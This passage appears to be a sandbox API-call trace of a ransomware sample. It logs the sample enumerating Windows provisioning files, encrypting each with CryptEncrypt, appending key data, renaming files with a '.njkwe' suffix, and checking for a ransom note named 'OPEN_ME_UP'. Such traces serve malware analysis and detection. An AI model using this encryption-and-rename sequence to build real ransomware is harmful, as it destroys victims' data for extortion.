SAR)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.130] lstrcmpiW (lpString1="177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.130] lstrcmpiW (lpString1="177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.130] lstrcmpiW (lpString1="177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.130] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml") returned 161 [0077.130] StrStrIW (lpFirst="177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.130] lstrcmpW (lpString1="177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.130] lstrcmpW (lpString1="177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.130] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\177__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.130] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\177__connections_cellular_3 (hong kong sar)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.130] GetTickCount () returned 0x11539e8 [0077.130] GetTickCount () returned 0x11539e8 [0077.130] GetTickCount () returned 0x11539e8 [0077.130] GetTickCount () returned 0x11539e8 [0077.130] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.130] GetProcessHeap () returned 0xbe0000 [0077.130] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.130] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0077.137] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.137] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0077.137] GetProcessHeap () returned 0xbe0000 [0077.137] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.137] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.137] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.137] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.137] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.137] CloseHandle (hObject=0x43c) returned 1 [0077.137] GetProcessHeap () returned 0xbe0000 [0077.137] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.137] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.137] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\177__connections_cellular_3 (hong kong sar)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\177__Connections_Cellular_3 (Hong Kong SAR)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\177__connections_cellular_3 (hong kong sar)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.138] GetProcessHeap () returned 0xbe0000 [0077.138] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.138] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906c07a8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906c07a8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906c07a8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml", cAlternateFileName="178__C~1.PRO")) returned 1 [0077.138] lstrcmpiW (lpString1="178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.138] lstrcmpiW (lpString1="178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.138] lstrcmpiW (lpString1="178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.138] lstrcmpiW (lpString1="178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.138] lstrcmpiW (lpString1="178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.138] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml") returned 161 [0077.138] StrStrIW (lpFirst="178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.138] lstrcmpW (lpString1="178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.138] lstrcmpW (lpString1="178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.138] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\178__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.138] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\178__connections_cellular_3 (hong kong sar)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.139] GetTickCount () returned 0x11539e8 [0077.139] GetTickCount () returned 0x11539e8 [0077.139] GetTickCount () returned 0x11539e8 [0077.139] GetTickCount () returned 0x11539e8 [0077.139] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.139] GetProcessHeap () returned 0xbe0000 [0077.139] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.139] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d9, lpOverlapped=0x0) returned 1 [0077.141] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.141] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d9, lpOverlapped=0x0) returned 1 [0077.141] GetProcessHeap () returned 0xbe0000 [0077.141] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.142] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.142] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.142] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.142] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.142] CloseHandle (hObject=0x43c) returned 1 [0077.142] GetProcessHeap () returned 0xbe0000 [0077.142] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.142] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\178__connections_cellular_3 (hong kong sar)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\178__Connections_Cellular_3 (Hong Kong SAR)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\178__connections_cellular_3 (hong kong sar)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.143] GetProcessHeap () returned 0xbe0000 [0077.143] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.143] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906c07a8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x906c07a8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x906c07a8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml", cAlternateFileName="179__C~1.PRO")) returned 1 [0077.143] lstrcmpiW (lpString1="179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.143] lstrcmpiW (lpString1="179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.143] lstrcmpiW (lpString1="179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.143] lstrcmpiW (lpString1="179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.143] lstrcmpiW (lpString1="179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.143] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml") returned 161 [0077.143] StrStrIW (lpFirst="179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.143] lstrcmpW (lpString1="179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.143] lstrcmpW (lpString1="179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.143] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\179__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.143] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\179__connections_cellular_3 (hong kong sar)_i4$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.143] GetTickCount () returned 0x11539f8 [0077.143] GetTickCount () returned 0x11539f8 [0077.143] GetTickCount () returned 0x11539f8 [0077.143] GetTickCount () returned 0x11539f8 [0077.143] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.144] GetProcessHeap () returned 0xbe0000 [0077.144] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.144] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0077.145] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.145] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0077.145] GetProcessHeap () returned 0xbe0000 [0077.145] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.145] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.145] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.145] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.145] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.145] CloseHandle (hObject=0x43c) returned 1 [0077.146] GetProcessHeap () returned 0xbe0000 [0077.146] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.146] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.146] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\179__connections_cellular_3 (hong kong sar)_i4$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\179__Connections_Cellular_3 (Hong Kong SAR)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\179__connections_cellular_3 (hong kong sar)_i4$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.146] GetProcessHeap () returned 0xbe0000 [0077.146] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.146] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90163088, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90163088, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90163088, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml", cAlternateFileName="17__CO~1.PRO")) returned 1 [0077.146] lstrcmpiW (lpString1="17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.146] lstrcmpiW (lpString1="17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.146] lstrcmpiW (lpString1="17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.146] lstrcmpiW (lpString1="17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.146] lstrcmpiW (lpString1="17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.146] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml") returned 160 [0077.146] StrStrIW (lpFirst="17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.146] lstrcmpW (lpString1="17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.147] lstrcmpW (lpString1="17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.147] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\17__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.147] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\17__connections_cellular_optus (australia)_i8$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.147] GetTickCount () returned 0x11539f8 [0077.147] GetTickCount () returned 0x11539f8 [0077.147] GetTickCount () returned 0x11539f8 [0077.147] GetTickCount () returned 0x11539f8 [0077.147] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.147] GetProcessHeap () returned 0xbe0000 [0077.147] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.147] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0077.148] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.148] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0077.149] GetProcessHeap () returned 0xbe0000 [0077.149] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.149] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.149] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.149] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.149] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.149] CloseHandle (hObject=0x43c) returned 1 [0077.149] GetProcessHeap () returned 0xbe0000 [0077.149] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.149] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0077.149] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\17__Connections_Cellular_Optus (Australia)_i8$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\17__connections_cellular_optus (australia)_i8$(__mvid)@wap.provxml"), 